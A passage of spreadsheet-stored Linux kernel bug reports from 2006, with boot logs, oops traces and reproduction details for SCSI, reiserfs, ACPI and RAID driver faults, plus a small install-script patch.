(IRQs 3 4 *5 6 7 10 11 12 14 15) SCSI subsystem initialized PCI: Using ACPI for IRQ routing PCI: If a device doesn't work, try "pci=routeirq". If it helps, post a report PCI: Bridge: 0000:00:01.0 IO window: disabled. MEM window: ff200000-ff2fffff PREFETCH window: disabled. PCI: Bridge: 0000:00:02.0 IO window: disabled. MEM window: ff300000-ff3fffff PREFETCH window: disabled. PCI: Bridge: 0000:00:05.0 IO window: disabled. MEM window: ff400000-ff4fffff PREFETCH window: c7f00000-d7efffff PCI: Bridge: 0000:00:06.0 IO window: d000-dfff MEM window: ff500000-ff5fffff PREFETCH window: 88000000-880fffff ACPI: PCI Interrupt 0000:00:01.0[A] -&gt; GSI 29 (level, low) -&gt; IRQ 16 PCI: Setting latency timer of device 0000:00:01.0 to 64 ACPI: PCI Interrupt 0000:00:02.0[A] -&gt; GSI 34 (level, low) -&gt; IRQ 17 PCI: Setting latency timer of device 0000:00:02.0 to 64 PCI: Setting latency timer of device 0000:00:05.0 to 64 PCI: Setting latency timer of device 0000:00:06.0 to 64 Machine check exception polling timer started. highmem bounce pool size: 64 pages io scheduler noop registered io scheduler anticipatory registered (default) vesafb: framebuffer at 0xc8000000, mapped to 0xf8880000, using 3072k, total 16384k vesafb: mode is 1024x768x16, linelength=2048, pages=9 vesafb: protected mode interface info at c000:7880 vesafb: scrolling: redraw vesafb: Truecolor: size=0:5:6:5, shift=0:11:5:0 Console: switching to colour frame buffer device 128x48 fb0: VESA VGA frame buffer device Real Time Clock Driver v1.12ac serio: i8042 AUX port at 0x60,0x64 irq 12 serio: i8042 KBD port at 0x60,0x64 irq 1 Serial: 8250/16550 driver $Revision: 1.90 $ 2 ports, IRQ sharing disabled serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A Floppy drive(s): fd0 is 1.44M FDC 0 is a post-1991 82077 via-rhine.c:v1.10-LK1.2.0-2.6 June-10-2004 Written by Donald Becker ACPI: PCI Interrupt 0000:04:07.0[A] -&gt; GSI 22 (level, low) -&gt; IRQ 18 PCI: Via IRQ fixup for 0000:04:07.0, from 11 to 2 eth0: VIA Rhine II at 0xff5fec00, 00:50:ba:f2:a3:1d, IRQ 18. eth0: MII PHY found at address 8, status 0x782d advertising 01e1 Link 45e1. ACPI: PCI Interrupt 0000:04:06.0[A] -&gt; GSI 21 (level, low) -&gt; IRQ 19 scsi0 : Adaptec AIC7XXX EISA/VLB/PCI SCSI HBA DRIVER, Rev 7.0 &lt;Adaptec 29160N Ultra160 SCSI adapter&gt; aic7892: Ultra160 Wide Channel A, SCSI Id=7, 32/253 SCBs Vendor: PIONEER Model: DVD-ROM DVD-305 Rev: 1.03 Type: CD-ROM ANSI SCSI revision: 02 target0:0:4: Beginning Domain Validation target0:0:4: FAST-20 SCSI 20.0 MB/s ST (50 ns, offset 16) target0:0:4: Domain Validation skipping write tests target0:0:4: Ending Domain Validation Vendor: PLEXTOR Model: CD-R PX-W1210S Rev: 1.01 Type: CD-ROM ANSI SCSI revision: 02 target0:0:5: Beginning Domain Validation target0:0:5: FAST-20 SCSI 20.0 MB/s ST (50 ns, offset 16) target0:0:5: Domain Validation skipping write tests target0:0:5: Ending Domain Validation Vendor: IBM Model: DDYS-T36950N Rev: S96H Type: Direct-Access ANSI SCSI revision: 03 scsi0:A:6:0: Tagged Queuing enabled. Depth 200 target0:0:6: Beginning Domain Validation target0:0:6: wide asynchronous target0:0:6: FAST-80 WIDE SCSI 160.0 MB/s DT (12.5 ns, offset 63) target0:0:6: Ending Domain Validation SCSI device sda: 71687340 512-byte hdwr sectors (36704 MB) sda: Write Protect is off sda: Mode Sense: cb 00 00 08 SCSI device sda: drive cache: write back SCSI device sda: 71687340 512-byte hdwr sectors (36704 MB) sda: Write Protect is off sda: Mode Sense: cb 00 00 08 SCSI device sda: drive cache: write back sda: sda1 sda2 sda3 sda4 sd 0:0:6:0: Attached scsi disk sda sr0: scsi3-mmc drive: 16x/40x cd/rw xa/form2 cdda tray Uniform CD-ROM driver Revision: 3.20 sr 0:0:4:0: Attached scsi CD-ROM sr0 sr1: scsi3-mmc drive: 32x/32x writer cd/rw xa/form2 cdda tray sr 0:0:5:0: Attached scsi CD-ROM sr1 sr 0:0:4:0: Attached scsi generic sg0 type 5 sr 0:0:5:0: Attached scsi generic sg1 type 5 sd 0:0:6:0: Attached scsi generic sg2 type 0 mice: PS/2 mouse device common for all mice MC: drivers/edac/edac_mc.c version edac_mc Ver: 2.0.0 Feb 4 2006 NET: Registered protocol family 2 input: AT Translated Set 2 keyboard as /class/input/input0 IP route cache hash table entries: 131072 (order: 7, 524288 bytes) TCP established hash table entries: 131072 (order: 9, 3145728 bytes) TCP bind hash table entries: 65536 (order: 8, 1572864 bytes) TCP: Hash tables configured (established 131072 bind 65536) TCP reno registered TCP bic registered NET: Registered protocol family 1 NET: Registered protocol family 17 Starting balanced_irq Using IPI Shortcut mode EXT3-fs: mounted filesystem with ordered data mode. kjournald starting. Commit interval 5 seconds VFS: Mounted root (ext3 filesystem) readonly. Freeing unused kernel memory: 208k freed Write protecting the kernel read-only data: 329k input: ImExPS/2 Generic Explorer Mouse as /class/input/input1 Adding 763076k swap on /dev/sda3. Priority:-1 extents:1 across:763076k EXT3 FS on sda1, internal journal Linux agpgart interface v0.101 (c) Dave Jones ReiserFS: sda2: found reiserfs format "3.6" with standard journal ReiserFS: sda2: using ordered data mode ReiserFS: sda2: journal params: device sda2, size 8192, journal first block 18, max trans len 1024, max batch 900, max commit age 30, max trans age 30 ReiserFS: sda2: checking transaction log (sda2) ReiserFS: sda2: Using r5 hash to sort names ReiserFS: sda4: found reiserfs format "3.6" with standard journal ReiserFS: sda4: using ordered data mode ReiserFS: sda4: journal params: device sda4, size 8192, journal first block 18, max trans len 1024, max batch 900, max commit age 30, max trans age 30 ReiserFS: sda4: checking transaction log (sda4) ReiserFS: sda4: Using r5 hash to sort names eth0: link up, 100Mbps, full-duplex, lpa 0x45E1 ACPI: PCI Interrupt 0000:04:05.0[A] -&gt; GSI 20 (level, low) -&gt; IRQ 20 usbcore: registered new driver usbfs usbcore: registered new driver hub USB Universal Host Controller Interface driver v2.3 Unable to handle kernel paging request at virtual address f49667f8 printing eip: c0233ccf *pde = 00490067 Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC Modules linked in: snd_seq_oss snd_seq_midi_event snd_seq snd_pcm_oss snd_mixer_oss uhci_hcd usbcore snd_emu10k1 snd_rawmidi snd_ac97_codec snd_ac97_bus snd_pcm snd_seq_device snd_</t>
  </si>
  <si>
    <t>aic94xx driver assertion in non-x86 BIOS environment</t>
  </si>
  <si>
    <t>AIC94XX</t>
  </si>
  <si>
    <t>2006-02-09 12:25 UTC</t>
  </si>
  <si>
    <t>Chris McDermott</t>
  </si>
  <si>
    <t>2006-09-07 10:21 UTC</t>
  </si>
  <si>
    <t>Loading aic94xx/sas_class driver from Jeff Garzik's sas-2.6.git tree results in the following assertion: aic94xx: no valid dir signature(?? at start of OCM aic94xx: couldn't read ocm(-2) ----------- [cut here ] --------- [please bite here ] --------- Kernel BUG at drivers/scsi/aic94xx/aic94xx_reg.c:293 Problem occurs on any non-x86 BIOS system (i.e., reproduced on ppc64, ia64, and x86_64 system with AIC9410 SAS controller BIOS disabled). aic94xx driver needs to be functional on architectures other than just x86(-64).</t>
  </si>
  <si>
    <t>aic94xx/sas_class - panic due to NULL pointer dereference in sas_alloc_class()</t>
  </si>
  <si>
    <t>2006-02-09 12:44 UTC</t>
  </si>
  <si>
    <t>2006-09-07 10:22 UTC</t>
  </si>
  <si>
    <t>Reproduced this using the aic94xx/sas_class driver from Jeff Garzik's sas-2.6.git tree. RIP: 0010:[&lt;ffffffff801eab62&gt;] &lt;ffffffff801eab62&gt;{memset+50} RSP: 0018:000001007f9fbda0 EFLAGS: 00010203 RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000004 RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000 RBP: 0000010003365480 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000168 R12: 000001007e908d00 R13: 00000000 fffffff4 R14: 000001007e990010 R15: ffffffffa0002874 FS: 0000000000000000(0000 ) GS:ffffffff804d8380(0000) knlGS:0000000000000000 CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b CR2: 0000000000000000 CR3: 000000007fe08000 CR4: 00000000 000006e0 Process kblockd/6 (pid: 62, threadinfo 000001007f9fa000, task 00000100 7f9877f0) Stack: ffffffffa00d0253 00000001033bfe36 0000010003305800 0000000000000246 ffffffff8013f384 0000000000000000 000001007e908d00 0000000000000287 0000010003305800 0000000000000000 Call Trace:&lt;ffffffffa00d0253&gt;{:sas_class:sas_queuecommand+149} &lt;ffffffff8013f384&gt;{__mod_timer+293} &lt;ffffffff80249d5d&gt;{blk_unplug_work+0 } &lt;ffffffffa0002adf&gt;{:scsi_mod:scsi_dispatch_cmd+595} &lt;ffffffffa0007a5a&gt;{:scsi_mod:scsi_request_fn+990} +&lt;ffffffff80249d39&gt;{generic_unplug_device+24} &lt;ffffffff80146e1a&gt;{worker_thread+419} +&lt;ffffffff801333e9&gt;{default_wake_function+0} &lt;ffffffff8013343a&gt;{__wake_up_common+67} +&lt;ffffffff801333e9&gt;{default_wake_function+0} &lt;ffffffff8014aab8&gt;{keventd_create_kthread+0} +&lt;ffffffff80146c77&gt;{worker_thread+0} &lt;ffffffff8014aab8&gt;{keventd_create_kthread+0} +&lt;ffffffff8014aa8f&gt;{kthread+200} &lt;ffffffff80110e17&gt;{child_rip+8} +&lt;ffffffff8014aab8&gt;{keventd_create_kthread+0} &lt;ffffffff8014a9c7&gt;{kthread+0} &lt;ffffffff80110e0f&gt;{child_rip+0}</t>
  </si>
  <si>
    <t>2006-02-09 13:35 UTC</t>
  </si>
  <si>
    <t>2006-03-30 10:30 UTC</t>
  </si>
  <si>
    <t>scsi_drivers-aic94xx</t>
  </si>
  <si>
    <t>Using the aic94xx/sas_class driver from Jeff Garzik's sas-2.6-git tree, during boot the system will (sometimes more than) periodically panic/hang due to a race condition between device discovery of the root disk and an attempt to mount the root file system.</t>
  </si>
  <si>
    <t>aic94xx/sas_class - SCSI timeout errors reported during I/O stress test</t>
  </si>
  <si>
    <t>2006-02-09 15:27 UTC</t>
  </si>
  <si>
    <t>2006-03-30 10:25 UTC</t>
  </si>
  <si>
    <t>SCSI timeout errors occur during I/O stress tests using the aic94xx/sas_class drivers from Jeff Garzik's sas-2.6.git tree. This has been reproduced on an IBM x366 which uses an integrated AIC9410 Razor SAS controller. The drives are Seagate and Fujitsu SAS drives. The SAS driver sets the device timeout value to 3 seconds, which is probably too low. In sas_get_intl_timeout(), the driver reads mode page 0x19 and maps byte 4 to intl_timeout and byte 6 to iresp_timeout. The value returned in byte 4 is 0x7D0 (2000 milliseconds). sas_slave_configure() uses this value to calculate the scsi_dev timeout value (adds HZ to itnl_timeout). Sample output with dev.scsi.loging_level=0x1000: scsi &lt;0:2:0:0&gt; done TIMEOUT 0 scsi0 : destination target 0, lun 0 command = Write (10) 00 00 1b b3 a0 00 03 00 00 scsi &lt;0:2:0:0&gt; done TIMEOUT 0 scsi0 : destination target 0, lun 0 command = Write (10) 00 01 51 6f 40 00 00 08 00 . . scsi &lt;0:2:0:0&gt; done TIMEOUT 0 scsi0 : destination target 0, lun 0 command = Write (10) 00 00 24 df e0 00 04 00 00 scsi &lt;0:2:0:0&gt; done TIMEOUT 0 scsi0 : destination target 0, lun 0 command = Write (10) 00 00 24 e3 e0 00 03 38 00 scsi &lt;0:2:0:0&gt; done TIMEOUT 0 scsi0 : destination target 0, lun 0 command = Write (10) 00 00 24 e7 18 00 03 88 00 scsi &lt;0:2:0:0&gt; done TIMEOUT 0 scsi0 : destination target 0, lun 0 command = Write (10) 00 01 6a 0e e0 00 00 b0 00 scsi &lt;0:2:0:0&gt; done TIMEOUT 0 scsi0 : destination target 0, lun 0 command = Write (10) 00 00 24 ea a0 00 04 00 00 scsi &lt;0:2:0:0&gt; done TIMEOUT 0 scsi0 : destination target 0, lun 0 command = Write (10) 00 00 24 ee a0 00 04 00 00 SCSI error : &lt;0 2 0 0&gt; return code = 0x50000 end_request: I/O error, dev sdc, sector 1815456 Buffer I/O error on device sdc1, logical block 226928 lost page write due to I/O error on sdc1 SCSI error : &lt;0 2 0 0&gt; return code = 0x50000 end_request: I/O error, dev sdc, sector 22114112 Buffer I/O error on device sdc1, logical block 2764260 lost page write due to I/O error on sdc1 . . SCSI error : &lt;0 2 0 0&gt; return code = 0x50000 end_request: I/O error, dev sdc, sector 2403488 SCSI error : &lt;0 2 0 0&gt; return code = 0x50000 end_request: I/O error, dev sdc, sector 2404512</t>
  </si>
  <si>
    <t>Crash of reiserfs with millions of small text files</t>
  </si>
  <si>
    <t>2.6.14.4</t>
  </si>
  <si>
    <t>2006-02-10 01:42 UTC</t>
  </si>
  <si>
    <t>colossus73</t>
  </si>
  <si>
    <t>2007-07-08 01:57 UTC</t>
  </si>
  <si>
    <t>Hi, I have a reiserfs ( not 4 ) fileystem containing several million of small text files. Because of the famouse error 'Argument list too long' I tried the workaround with find . -iname '*.dnd' | xargs rm but it failed with: xargs: rm: exited with signal 11. So I tried with: 'for i in *.dnd; do rm ${i}; done' since nothing was happening ( the hard disk led was off ) I looked at dmesg code and I found this: ReiserFS: hdb3: warning: PAP-5660: reiserfs_do_truncate: wrong result -1 of sear ch for [1027 4191034 0xfffffffffffffff DIRECT] ReiserFS: hdb3: warning: clm-2100: nesting info a different FS ReiserFS: hdb3: warning: clm-2100: nesting info a different FS ------------[ cut here ]------------ kernel BUG at fs/reiserfs/journal.c:3097! invalid operand: 0000 [#1] PREEMPT Modules linked in: nls_iso8859_1 vfat fat usb_storage snd_pcm_oss snd_mixer_oss button ohci_hcd rtc intel_agp usbhid usbmouse uhci_hcd nvidia agpgart 8139too mi i snd_intel8x0 snd_ac97_codec snd_ac97_bus snd_pcm snd_timer snd soundcore snd_p age_alloc ehci_hcd usbcore xfs exportfs CPU: 0 EIP: 0060:[&lt;c01b5832&gt;] Tainted: P VLI EFLAGS: 00010246 (2.6.14.4) EIP is at journal_begin+0xe2/0xf0 eax: 00000000 ebx: cbaf5ecc ecx: f882d000 edx: f7ac6600 esi: cbaf5f18 edi: cbaf4000 ebp: f7ac6600 esp: cbaf5e9c ds: 007b es: 007b ss: 0068 Process rm (pid: 24187, threadinfo=cbaf4000 task=f3751a10) Stack: f3e23090 f3e23090 cbaf5ecc 00000000 c01a50b2 cbaf5ecc f7ac6600 00000012 00000000 00000000 023e308c 00000000 00000000 00000000 f882d000 cbaf5f18 f7ac6600 00000000 dba272b0 c01b5b1e cbaf5f18 f7ac6600 00000024 00000000 Call Trace: [&lt;c01a50b2&gt;] remove_save_link+0x22/0xd0 [&lt;c01b5b1e&gt;] journal_end+0x9e/0xd0 [&lt;c0198eee&gt;] reiserfs_delete_inode+0xae/0xf0 [&lt;c0198e40&gt;] reiserfs_delete_inode+0x0/0xf0 [&lt;c016fffb&gt;] generic_delete_inode+0x6b/0x100 [&lt;c0165e2e&gt;] sys_unlink+0xbe/0x110 [&lt;c011c11f&gt;] __do_softirq+0x4f/0xb0 [&lt;c0102fd9&gt;] syscall_call+0x7/0xb Code: 40 89 46 04 b9 09 00 00 00 89 df f3 a5 83 7b 04 01 7e 07 31 c0 5b 5e 5f 5d c3 68 94 b2 3b c0 55 e8 14 23 ff ff 59 5b 31 c0 eb ea &lt;0f&gt; 0b 19 0c 33 43 3b c0 eb cb 8d 74 26 00 55 57 56 53 83 ec 08 Badness in do_exit at kernel/exit.c:799 [&lt;c0119b37&gt;] do_exit+0x3a7/0x3f0 [&lt;c0103b50&gt;] do_invalid_op+0x0/0x90 [&lt;c0103990&gt;] die+0x160/0x170 [&lt;c0103bca&gt;] do_invalid_op+0x7a/0x90 [&lt;c01b5832&gt;] journal_begin+0xe2/0xf0 [&lt;c012b5b0&gt;] autoremove_wake_function+0x0/0x40 [&lt;c01032af&gt;] error_code+0x4f/0x60 [&lt;c01b5832&gt;] journal_begin+0xe2/0xf0 [&lt;c01a50b2&gt;] remove_save_link+0x22/0xd0 [&lt;c01b5b1e&gt;] journal_end+0x9e/0xd0 [&lt;c0198eee&gt;] reiserfs_delete_inode+0xae/0xf0 [&lt;c0198e40&gt;] reiserfs_delete_inode+0x0/0xf0 [&lt;c016fffb&gt;] generic_delete_inode+0x6b/0x100 [&lt;c0165e2e&gt;] sys_unlink+0xbe/0x110 [&lt;c011c11f&gt;] __do_softirq+0x4f/0xb0 [&lt;c0102fd9&gt;] syscall_call+0x7/0xb Now I have several processes marked with D state, the bash, the ls command i issued etc. I hope the above help, if not feel free to contact me. -- Colossus Xarchiver, a GTK2 only archive manager - http://xarchiver.sourceforge.net</t>
  </si>
  <si>
    <t>reiserfs/super.c commit breaks boot process</t>
  </si>
  <si>
    <t>2.6.15.2, 2.6.16-rc2-gd35c6028</t>
  </si>
  <si>
    <t>2006-02-11 05:45 UTC</t>
  </si>
  <si>
    <t>Horst Schirmeier</t>
  </si>
  <si>
    <t>2006-03-02 01:21 UTC</t>
  </si>
  <si>
    <t>(I've already posted this to LKML a few days ago: http://lkml.org/lkml/2006/2/7/184) The mainline commit d35c602870ece3166cff3d25fbc687a7f707acf3 ("[PATCH] Someone broke reiserfs v3 mount options and this fixes it") breaks the boot process for me and leads to an instant reboot. Unfortunately this commit was backported to Greg KH's stable tree (d1753372c3c16c9cfb88bed7f0278091187053f3), so 2.6.15.2 and .3 show the same behaviour. Reverting this commit (though it looks sane at first glance) makes both the stable and HEAD kernels boot again. The "Warning: unable to open an initial console." message is emitted after sys_open((const char __user *) "/dev/console", O_RDWR, 0)) in init/main.c fails; adding some debugging code revealed that sys_open actually returns -13 as an error code, which I can't make very much of. Kernel version (from /proc/version): Linux version 2.6.16-rc2-gc03296a8-dirty (root@nexus) (gcc version 3.4.4 (Gentoo 3.4.4-r1, ssp-3.4.4-1.0, pie-8.7.8)) #3 PREEMPT Tue Feb 7 15:15:56 CET 2006 (-dirty is only due to the reverted commit) Most recent kernel version which did not have the bug: 2.6.15.1, 2.6.16-rc2 Output of Oops (copied by hand from analog screenshot) [...] md: Autodetecting RAID arrays. md: autorun ... md: ... autorun DONE. ReiserFS: hda7: found reiserfs format "3.6" with standard journal ReiserFS: hda7: using ordered data mode ReiserFS: hda7: journal params: device hda7, size 8192, journal first block 18, max trans len 1024, max batch 900, max commit age 30, max trans age 30 ReiserFS: hda7: checking transaction log (hda7) ReiserFS: hda7: Using r5 hash to sort names VFS: Mounted root (reiserfs filesystem) readonly. Freeing unused kernel memory: 248k freed Warning: unable to open an initial console. md: stopping all md devices. md: md0 switched to read-only mode. &lt;at this point, the machine reboots after about one second&gt; Screenshot at http://wwwcip.informatik.uni-erlangen.de/~sihoschi/reiserfs-instant-reboot-screenshot.png Config file: At http://wwwcip.informatik.uni-erlangen.de/~sihoschi/reiserfs-instant-reboot-config.txt Please notify me if I can provide more/other information.</t>
  </si>
  <si>
    <t>2.6.15.4</t>
  </si>
  <si>
    <t>Fusion MPT driver does not detect controller</t>
  </si>
  <si>
    <t>2006-02-12 13:55 UTC</t>
  </si>
  <si>
    <t>stathis</t>
  </si>
  <si>
    <t>2007-07-06 18:27 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.13.5 Distribution: Slackware Hardware Environment: 2x Dual Core Opteron AMDs on a Tyan K8WE (S2895) board which has an LSI 53C1030 U320 SCSI controller Software Environment: Problem Description: The kernel panics when I try to boot the system with a 2.6.15.4 (and 2.6.14.7) kernel compiled from source, while 2.6.13.5 works fine. The config for the kernel is the same in all instances. I do not have a dump, but what appears to happen is that the scsi controller does not get detected and hence the root filesystem of my scsi drive is not mounted, so the kernel panics with the typical: VFS: Cannot open root device "812" or unknown-block(8,18) Please append a correct "root=" boot option Kernel panic - not syncing: VFS: Unable to mount root fs on unknown-block(8,18) After the Fusion MPT driver is loaded there are no relevant devices detected, as in 2.6.13.5.</t>
  </si>
  <si>
    <t>in 'make install' if lilo is not present 127 error code is returned and causes the next make option to not run.</t>
  </si>
  <si>
    <t>2006-02-13 07:38 UTC</t>
  </si>
  <si>
    <t>Stephen Leaf</t>
  </si>
  <si>
    <t>2007-10-23 12:47 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.15.4 Distribution: Custom Hardware Environment: x86 Software Environment: Problem Description: when issuing 'make install modules_install' modules_install is never ran if lilo is not installed. Reason: There is a check for /sbin/lilo but it fails back on /etc/lilo/install which is not always there. So we add a check for that. --- linux-2.6.15.4/arch/i386/boot/install.sh 2006-02-10 01:22:48.000000000 -0600 +++ /home/smileaf/install.sh 2006-02-12 23:05:46.000000000 -0600 @@ -37,4 +37,4 @@ cat $2 &gt; $4/vmlinuz cp $3 $4/System.map -if [ -x /sbin/lilo ]; then /sbin/lilo; else /etc/lilo/install; fi +if [ -x /sbin/lilo ]; then /sbin/lilo; elif [ -x /etc/lilo/install ]; then /etc/lilo/install; fi Steps to reproduce: make &amp;&amp; make install modules_install</t>
  </si>
  <si>
    <t>drivers/pci/hotplug/cpqphp_ctrl.c: board_replaced(): dead code</t>
  </si>
  <si>
    <t>2006-02-14 14:49 UTC</t>
  </si>
  <si>
    <t>2006-04-22 13:02 UTC</t>
  </si>
  <si>
    <t>The Coverity checker correctly noted, that in function board_replaced in drivers/pci/hotplug/cpqphp_ctrl.c, the variable src always has the value 8, and therefore much code after the ... if (rc || src) { ... if (rc) return rc; else return 1; } ... can never be called.</t>
  </si>
  <si>
    <t>ACPI EC problems on resume - AE_TIME</t>
  </si>
  <si>
    <t>2.6.17-rc3</t>
  </si>
  <si>
    <t>2006-02-14 15:17 UTC</t>
  </si>
  <si>
    <t>Robert Hancock</t>
  </si>
  <si>
    <t>2006-08-09 21:35 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Unknown Distribution: Fedora Core 4 Hardware Environment: Compaq Presario X1050 laptop Software Environment: n/a Problem Description: ACPI suspend and resume produces the following errors in dmesg. After resume, also the battery status is not displayed and the keyboard behaves erratically (missing and wrong characters). ACPI: read EC, IB not empty ACPI Exception (evregion-0409): AE_TIME, Returned by Handler for [EmbeddedControl] [20060127] ACPI Error (psparse-0517): Method parse/execution failed [\_SB_.C046.C059.C0EA.C132] (Node dfea01e0), AE_TIME ACPI Error (psparse-0517): Method parse/execution failed [\_SB_.C132] (Node c14dde20), AE_TIME ACPI Error (psparse-0517): Method parse/execution failed [\_SB_.C11F._BST] (Node c14ddd60), AE_TIME ACPI: read EC, IB not empty ACPI Exception (evregion-0409): AE_TIME, Returned by Handler for [EmbeddedControl] [20060127] ACPI Exception (dswexec-0458): AE_TIME, While resolving operands for [AE_NOT_CONFIGURED] [20060127] ACPI Error (psparse-0517): Method parse/execution failed [\_SB_.C046.C059.C0EA.C11D] (Node dfea0280), AE_TIME ACPI Error (psparse-0517): Method parse/execution failed [\_WAK] (Node c14dc500), AE_TIME ACPI Exception (hwsleep-0546): AE_TIME, During Method _WAK [20060127] ACPI: read EC, IB not empty ACPI Exception (evregion-0409): AE_TIME, Returned by Handler for [EmbeddedControl] [20060127] ACPI Error (psparse-0517): Method parse/execution failed [\_SB_.C046.C059.C0EA.C132] (Node dfea01e0), AE_TIME ACPI Error (psparse-0517): Method parse/execution failed [\_SB_.C132] (Node c14dde20), AE_TIME ACPI Error (psparse-0517): Method parse/execution failed [\_SB_.C11F._BST] (Node c14ddd60), AE_TIME Steps to reproduce: Enter ACPI suspend and then resume on the above computer.</t>
  </si>
  <si>
    <t>AOC-LPZCR1 hangs</t>
  </si>
  <si>
    <t>AACRAID</t>
  </si>
  <si>
    <t>2006-02-15 14:07 UTC</t>
  </si>
  <si>
    <t>Milen Pankov</t>
  </si>
  <si>
    <t>2006-04-19 06:02 UTC</t>
  </si>
  <si>
    <t>scsi_drivers-aacraid</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: none. Distribution: Slackware Linux current. Hardware Environment: SuperMicro X6DH3-G2, 2 x Intel Xeon 3.4 Mhz, 4 x 1 GB DDR2, SuperMicro AOC-LPZCR1 RAID Controller, 5 x 80 GB Seagate SATA in RAID 5 array. Software Environment: Nothing except the standart slackware packages. Problem Description: Very often, but not every time the RAID controller hangs and the array dissapers from the system. When this happens a 'Segmentation fault' error is returned and the screen begins to fill with the following message - 'scsi (0:0): rejecting I/O to offline device'. In the system log there is the following text (between the dots): ................................... [ cut here ]------------ kernel BUG at drivers/scsi/aacraid/aachba.c:972! invalid operand: 0000 [#1] Modules linked in: CPU: 0 EIP: 0060:[&lt;c037d4b4&gt;] Not tainted VLI EFLAGS: 00010202 (2.6.13) EIP is at aac_read+0x223/0x22d eax: 00000284 ebx: f7f32020 ecx: f7f322a0 edx: 00034000 esi: 0f728c6f edi: 000001a0 ebp: f7ef1db0 esp: f5cd3c50 ds: 007b es: 007b ss: 0068 Process lspci (pid: 10452, threadinfo=f5cd2000 task=f6dc1530) Stack: f5de9380 f7f32030 00000410 f7d45490 f7d45490 2a813000 00000001 29537000 f7e6b254 f7e6b254 00000000 f7e6b000 f5de9380 c037dc5a f5de9380 00000000 f7e89800 f7e89800 0f728c6f 00000000 00000bb8 00034000 0000002d c379f000 Call Trace: [&lt;c037dc5a&gt;] aac_scsi_cmd+0x2b3/0x49b [&lt;c037b721&gt;] aac_queuecommand+0x19/0x29 [&lt;c0343bc1&gt;] scsi_dispatch_cmd+0x151/0x21e [&lt;c0343da2&gt;] scsi_done+0x0/0x26 [&lt;c03465db&gt;] scsi_times_out+0x0/0xa0 [&lt;c0349134&gt;] scsi_request_fn+0x17e/0x305 [&lt;c013d134&gt;] __do_page_cache_readahead+0xf9/0x10b [&lt;c0303c0f&gt;] generic_unplug_device+0x10/0x15 [&lt;c0158ec0&gt;] block_sync_page+0x38/0x45 [&lt;c013591c&gt;] sync_page+0x39/0x4b [&lt;c045ded5&gt;] __wait_on_bit_lock+0x41/0x61 [&lt;c01358e3&gt;] sync_page+0x0/0x4b [&lt;c0136188&gt;] __lock_page+0x9d/0xb1 [&lt;c012c258&gt;] wake_bit_function+0x0/0x55 [&lt;c012c258&gt;] wake_bit_function+0x0/0x55 [&lt;c013681d&gt;] do_generic_mapping_read+0x335/0x7fd [&lt;c0136f80&gt;] __generic_file_aio_read+0x19d/0x203 [&lt;c0136ce5&gt;] file_read_actor+0x0/0xfe [&lt;c0137040&gt;] generic_file_aio_read+0x5a/0x74 [&lt;c015417a&gt;] do_sync_read+0xd1/0x12c [&lt;c01121da&gt;] do_page_fault+0x1b6/0x62b [&lt;c012c201&gt;] autoremove_wake_function+0x0/0x57 [&lt;c015437a&gt;] vfs_read+0x1a5/0x1aa [&lt;c01546a6&gt;] sys_read+0x51/0x80 [&lt;c0102e95&gt;] syscall_call+0x7/0xb Code: 00 00 c7 44 24 0c 01 00 00 00 89 44 24 08 89 6c 24 04 c7 04 24 f5 01 00 00 e9 f7 fe f f ff 0f 0b e4 03 ca 4b 49 c0 e9 b3 fe ff ff &lt;0f&gt; 0b cc 03 ca 4b 49 c0 eb aa 83 ec 38 89 6c 24 34 89 5c 24 28 &lt;3&gt;aacraid: Host adapter reset request. SCSI hang ? ................................... Steps to reproduce: The error seem to appear during compiltion of a new kernel or when issuing 'lspci' (nothing else done yet on the system). The above error is from issuing the 'lspci' command. The error does not appear always. Also the error does not seem to appear in system running with kernel precompiled for 486 architecture. The error seems to appear when running on kernel precompiled for Intel Pentium 4/Intel Xeon and with multiprocessor and high memory support. Kernels tested - from 2.6.13 to 2.6.15.</t>
  </si>
  <si>
    <t>S3: mutiple button of lid events: Thinkpad X21</t>
  </si>
  <si>
    <t>2006-02-17 15:21 UTC</t>
  </si>
  <si>
    <t>Eric Jorgensen</t>
  </si>
  <si>
    <t>2006-08-26 18:42 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: N/A Distribution: Debian/Etch Hardware Environment: Thinkpad X21 2662-RRG Problem Description: I did not attempt to use ACPI prior to 2.6.14, and have had this issue with 2.6.14 and 2.6.15. Upon resume from S3 (echo -n "mem" &gt; /sys/power/state), my 'sleep' action script for acpid will completely finish, and be immediately called again by acpid. This always happens exactly twice. I have to wake up the laptop three times for every time i suspend to ram. Example log snippet: [Fri Feb 17 15:06:38 2006] received event "button/lid LID 00000080 00000076" [Fri Feb 17 15:06:38 2006] executing action "/etc/acpi/actions/sleep.sh button/lid LID 00000080 00000076" [Fri Feb 17 15:07:24 2006] action exited with status 0 [Fri Feb 17 15:07:24 2006] completed event "button/lid LID 00000080 00000076" [Fri Feb 17 15:07:24 2006] received event "button/lid LID 00000080 00000077" [Fri Feb 17 15:07:24 2006] executing action "/etc/acpi/actions/sleep.sh button/lid LID 00000080 00000077" [Fri Feb 17 15:08:07 2006] action exited with status 0 [Fri Feb 17 15:08:07 2006] completed event "button/lid LID 00000080 00000077" [Fri Feb 17 15:08:07 2006] received event "button/lid LID 00000080 00000078" [Fri Feb 17 15:08:07 2006] executing action "/etc/acpi/actions/sleep.sh button/lid LID 00000080 00000078" [Fri Feb 17 15:08:50 2006] action exited with status 0 [Fri Feb 17 15:08:50 2006] completed event "button/lid LID 00000080 00000078" fwiw, the power button is the only way to wake up the thinkpad when it's in S3. With APM, it would wake up automatically when the lid was opened.</t>
  </si>
  <si>
    <t>drivers/scsi/pcmcia/aha152x_stub.c: aha152x_resume(): variable used before set</t>
  </si>
  <si>
    <t>AHA152X</t>
  </si>
  <si>
    <t>2.6.16-rc4 and earlier</t>
  </si>
  <si>
    <t>2006-02-17 18:09 UTC</t>
  </si>
  <si>
    <t>scsi_drivers-aha152x</t>
  </si>
  <si>
